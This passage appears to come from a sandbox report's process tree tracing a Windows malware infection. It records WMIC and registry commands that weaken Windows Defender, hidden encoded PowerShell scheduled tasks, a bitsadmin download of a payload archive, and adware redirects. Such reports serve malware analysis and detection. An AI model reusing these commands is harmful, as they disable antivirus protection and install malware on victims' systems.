C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfoNxSwpt" /SC once /ST 00:14:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 09:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\CCwdtYy.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\oRwRi1GBtOt2bWpZEv9NvTbH.exe"C:\Users\Admin\Documents\oRwRi1GBtOt2bWpZEv9NvTbH.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-R7QC7.tmp\oRwRi1GBtOt2bWpZEv9NvTbH.tmp"C:\Users\Admin\AppData\Local\Temp\is-R7QC7.tmp\oRwRi1GBtOt2bWpZEv9NvTbH.tmp" /SL5="$603CC,506127,422400,C:\Users\Admin\Documents\oRwRi1GBtOt2bWpZEv9NvTbH.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-R01CF.tmp\Adam.exe"C:\Users\Admin\AppData\Local\Temp\is-R01CF.tmp\Adam.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Program Files\Uninstall Information\RGWLVXUEKL\foldershare.exe"C:\Program Files\Uninstall Information\RGWLVXUEKL\foldershare.exe" /VERYSILENT11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\0e-c612f-503-506be-ccde8a0858706\Jixaetaekyzha.exe"C:\Users\Admin\AppData\Local\Temp\0e-c612f-503-506be-ccde8a0858706\Jixaetaekyzha.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Users\Admin\AppData\Local\Temp\67-d31ee-9a5-c098a-95735279e89ad\Safapaehilae.exe"C:\Users\Admin\AppData\Local\Temp\67-d31ee-9a5-c098a-95735279e89ad\Safapaehilae.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\la502f3w.u54\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\la502f3w.u54\installer.exeC:\Users\Admin\AppData\Local\Temp\la502f3w.u54\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n0yvzpga.ugu\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\n0yvzpga.ugu\any.exeC:\Users\Admin\AppData\Local\Temp\n0yvzpga.ugu\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5di214bo.3ay\Browser4Download.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\5di214bo.3ay\Browser4Download.exeC:\Users\Admin\AppData\Local\Temp\5di214bo.3ay\Browser4Download.exe13⤵
-
C:\Users\Admin\AppData\Roaming\5685516.scr"C:\Users\Admin\AppData\Roaming\5685516.scr" /S14⤵
-
C:\Users\Admin\AppData\Roaming\3932054.scr"C:\Users\Admin\AppData\Roaming\3932054.scr" /S14⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4lqgqfgq.rsv\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\4lqgqfgq.rsv\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\4lqgqfgq.rsv\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPbRz4ETRZ9bWlRf -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnczkWtKvNiK8PYi -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pewnjdyy.vsr\installer.exe /qn CAMPAIGN=654 & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\pewnjdyy.vsr\installer.exeC:\Users\Admin\AppData\Local\Temp\pewnjdyy.vsr\installer.exe /qn CAMPAIGN=65413⤵
-
C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe"C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe"C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe"9⤵
-
C:\Users\Admin\Documents\0A9UpDpkQ6W9jyUpZc4AbO0D.exe"C:\Users\Admin\Documents\0A9UpDpkQ6W9jyUpZc4AbO0D.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exe10⤵
-
C:\Users\Admin\Documents\mz3j1eZvlG3xLyLgnJGzG2iz.exe"C:\Users\Admin\Documents\mz3j1eZvlG3xLyLgnJGzG2iz.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\uMeEz43SOKtmKNkVp0PAKaxN.exe"C:\Users\Admin\Documents\uMeEz43SOKtmKNkVp0PAKaxN.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
C:\Users\Admin\Documents\1U7rz2B7WbSFlXtvDg8Z5IbN.exe"C:\Users\Admin\Documents\1U7rz2B7WbSFlXtvDg8Z5IbN.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\VQgrNhc4WsP27ikp84942S7c.exe"C:\Users\Admin\Documents\VQgrNhc4WsP27ikp84942S7c.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6288 -s 2687⤵
- Program crash
-
C:\Users\Admin\Documents\CTutXdLZ4xbLs74URA0ecSII.exe"C:\Users\Admin\Documents\CTutXdLZ4xbLs74URA0ecSII.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 2687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\pd0GmSfuZ2V71wU_KPGmGqbl.exe"C:\Users\Admin\Documents\pd0GmSfuZ2V71wU_KPGmGqbl.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS3B5E.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS6CFD.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
